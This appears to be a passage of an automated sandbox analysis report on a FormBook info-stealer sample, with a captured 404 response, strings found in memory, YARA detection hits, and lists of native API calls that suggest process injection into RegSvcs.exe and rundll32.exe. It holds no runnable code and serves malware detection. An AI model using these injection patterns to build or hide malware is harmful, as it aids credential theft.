6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /msc/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: gzU8odwaPalRTGB.exe, 00000000.00000003.237699855.000000000194D000.00000004.00000001.sdmp	String found in binary or memory: http://en.w
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261130122.00000000030E1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: gzU8odwaPalRTGB.exe	String found in binary or memory: http://tempuri.org/GridOneHSDataSet.xsd
Source: gzU8odwaPalRTGB.exe	String found in binary or memory: http://tempuri.org/HighScoresDataSet.xsd
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266271453.0000000006290000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comcetab
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266271453.0000000006290000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.como
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, gzU8odwaPalRTGB.exe, 00000000.00000003.238346544.00000000062AE000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: gzU8odwaPalRTGB.exe, 00000000.00000003.238372995.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comc6l=
Source: gzU8odwaPalRTGB.exe, 00000000.00000003.238372995.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comicwl
Source: gzU8odwaPalRTGB.exe, 00000000.00000003.238340434.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comnMlB
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, gzU8odwaPalRTGB.exe, 00000000.00000003.240223538.00000000062CD000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: gzU8odwaPalRTGB.exe, 00000000.00000003.240412200.0000000006294000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/y
Source: gzU8odwaPalRTGB.exe, 00000000.00000003.240223538.00000000062CD000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn;
Source: gzU8odwaPalRTGB.exe, 00000000.00000003.240236409.0000000006294000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnN
Source: gzU8odwaPalRTGB.exe, 00000000.00000003.240236409.0000000006294000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnc
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: gzU8odwaPalRTGB.exe, 00000000.00000003.241670026.0000000006294000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: gzU8odwaPalRTGB.exe, 00000000.00000003.241670026.0000000006294000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/F
Source: gzU8odwaPalRTGB.exe, 00000000.00000003.241670026.0000000006294000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, gzU8odwaPalRTGB.exe, 00000000.00000003.238136203.00000000062AE000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: gzU8odwaPalRTGB.exe, 00000000.00000003.238136203.00000000062AE000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.coma-d
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: gzU8odwaPalRTGB.exe, 00000000.00000003.239669252.0000000006296000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.krv
Source: explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: gzU8odwaPalRTGB.exe, 00000000.00000003.238853595.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com6l=
Source: gzU8odwaPalRTGB.exe, 00000000.00000003.238739060.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comhlg
Source: gzU8odwaPalRTGB.exe, 00000000.00000003.238853595.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comn
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D56E58 NtQueryInformationProcess,	0_2_07D56E58
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D56E51 NtQueryInformationProcess,	0_2_07D56E51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00419D60 NtCreateFile,	5_2_00419D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00419E10 NtReadFile,	5_2_00419E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00419E90 NtClose,	5_2_00419E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00419F40 NtAllocateVirtualMemory,	5_2_00419F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00419D5A NtCreateFile,	5_2_00419D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00419E0A NtReadFile,	5_2_00419E0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00419F3A NtAllocateVirtualMemory,	5_2_00419F3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F598F0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_00F598F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59860 NtQuerySystemInformation,LdrInitializeThunk,	5_2_00F59860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59840 NtDelayExecution,LdrInitializeThunk,	5_2_00F59840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F599A0 NtCreateSection,LdrInitializeThunk,	5_2_00F599A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59910 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_00F59910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59A50 NtCreateFile,LdrInitializeThunk,	5_2_00F59A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59A20 NtResumeThread,LdrInitializeThunk,	5_2_00F59A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59A00 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_00F59A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F595D0 NtClose,LdrInitializeThunk,	5_2_00F595D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59540 NtReadFile,LdrInitializeThunk,	5_2_00F59540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F596E0 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_00F596E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59660 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_00F59660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F597A0 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_00F597A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59780 NtMapViewOfSection,LdrInitializeThunk,	5_2_00F59780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59710 NtQueryInformationToken,LdrInitializeThunk,	5_2_00F59710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F598A0 NtWriteVirtualMemory,	5_2_00F598A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F5B040 NtSuspendThread,	5_2_00F5B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59820 NtEnumerateKey,	5_2_00F59820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F599D0 NtCreateProcessEx,	5_2_00F599D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59950 NtQueueApcThread,	5_2_00F59950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59A80 NtOpenDirectoryObject,	5_2_00F59A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59A10 NtQuerySection,	5_2_00F59A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F5A3B0 NtGetContextThread,	5_2_00F5A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59B00 NtSetValueKey,	5_2_00F59B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F595F0 NtQueryInformationFile,	5_2_00F595F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59560 NtWriteFile,	5_2_00F59560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F5AD30 NtSetContextThread,	5_2_00F5AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59520 NtWaitForSingleObject,	5_2_00F59520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F596D0 NtCreateKey,	5_2_00F596D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59670 NtQueryInformationProcess,	5_2_00F59670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59650 NtQueryValueKey,	5_2_00F59650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59610 NtEnumerateValueKey,	5_2_00F59610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59FE0 NtCreateMutant,	5_2_00F59FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59770 NtSetInformationFile,	5_2_00F59770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F5A770 NtOpenThread,	5_2_00F5A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59760 NtOpenProcess,	5_2_00F59760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F59730 NtQueryVirtualMemory,	5_2_00F59730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00F5A710 NtOpenProcessToken,	5_2_00F5A710
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9860 NtQuerySystemInformation,LdrInitializeThunk,	15_2_04FD9860
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9840 NtDelayExecution,LdrInitializeThunk,	15_2_04FD9840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD95D0 NtClose,LdrInitializeThunk,	15_2_04FD95D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD99A0 NtCreateSection,LdrInitializeThunk,	15_2_04FD99A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9540 NtReadFile,LdrInitializeThunk,	15_2_04FD9540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	15_2_04FD9910
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD96E0 NtFreeVirtualMemory,LdrInitializeThunk,	15_2_04FD96E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD96D0 NtCreateKey,LdrInitializeThunk,	15_2_04FD96D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9660 NtAllocateVirtualMemory,LdrInitializeThunk,	15_2_04FD9660
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9A50 NtCreateFile,LdrInitializeThunk,	15_2_04FD9A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9650 NtQueryValueKey,LdrInitializeThunk,	15_2_04FD9650
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9FE0 NtCreateMutant,LdrInitializeThunk,	15_2_04FD9FE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9780 NtMapViewOfSection,LdrInitializeThunk,	15_2_04FD9780
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9710 NtQueryInformationToken,LdrInitializeThunk,	15_2_04FD9710
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD98F0 NtReadVirtualMemory,	15_2_04FD98F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD98A0 NtWriteVirtualMemory,	15_2_04FD98A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FDB040 NtSuspendThread,	15_2_04FDB040
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9820 NtEnumerateKey,	15_2_04FD9820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD95F0 NtQueryInformationFile,	15_2_04FD95F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD99D0 NtCreateProcessEx,	15_2_04FD99D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9560 NtWriteFile,	15_2_04FD9560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9950 NtQueueApcThread,	15_2_04FD9950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FDAD30 NtSetContextThread,	15_2_04FDAD30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9520 NtWaitForSingleObject,	15_2_04FD9520
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9A80 NtOpenDirectoryObject,	15_2_04FD9A80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9670 NtQueryInformationProcess,	15_2_04FD9670
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9A20 NtResumeThread,	15_2_04FD9A20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9610 NtEnumerateValueKey,	15_2_04FD9610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9A10 NtQuerySection,	15_2_04FD9A10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9A00 NtProtectVirtualMemory,	15_2_04FD9A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FDA3B0 NtGetContextThread,	15_2_04FDA3B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD97A0 NtUnmapViewOfSection,	15_2_04FD97A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9770 NtSetInformationFile,	15_2_04FD9770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FDA770 NtOpenThread,	15_2_04FDA770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9760 NtOpenProcess,	15_2_04FD9760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9730 NtQueryVirtualMemory,	15_2_04FD9730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FDA710 NtOpenProcessToken,	15_2_04FDA710
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04FD9B00 NtSetValueKey,	15_2_04FD9B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F79D60 NtCreateFile,	15_2_00F79D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F79E90 NtClose,	15_2_00F79E90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F79E10 NtReadFile,	15_2_00F79E10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F79F40 NtAllocateVirtualMemory,	15_2_00F79F40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F79D5A NtCreateFile,	15_2_00F79D5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F79E0A NtReadFile,	15_2_00F79E0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00F79F3A NtAllocateVirtualMemory,	15_2_00F79F3A

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_00D5DCE7	0_2_00D5DCE7
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_00D5A9EA	0_2_00D5A9EA
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_0167C2B0	0_2_0167C2B0
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_01679990	0_2_01679990
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D5C4B8	0_2_07D5C4B8
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D55430	0_2_07D55430
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D5D2C8	0_2_07D5D2C8
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D5C180	0_2_07D5C180
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D51FE8	0_2_07D51FE8
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D5CC08	0_2_07D5CC08
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D5F998	0_2_07D5F998
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D50780	0_2_07D50780
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D50770	0_2_07D50770
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D56478	0_2_07D56478
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D56468	0_2_07D56468
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D55420	0_2_07D55420
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D59158	0_2_07D59158
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D59148	0_2_07D59148
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Code function: 0_2_07D51FD8	0_2_07D51FD8
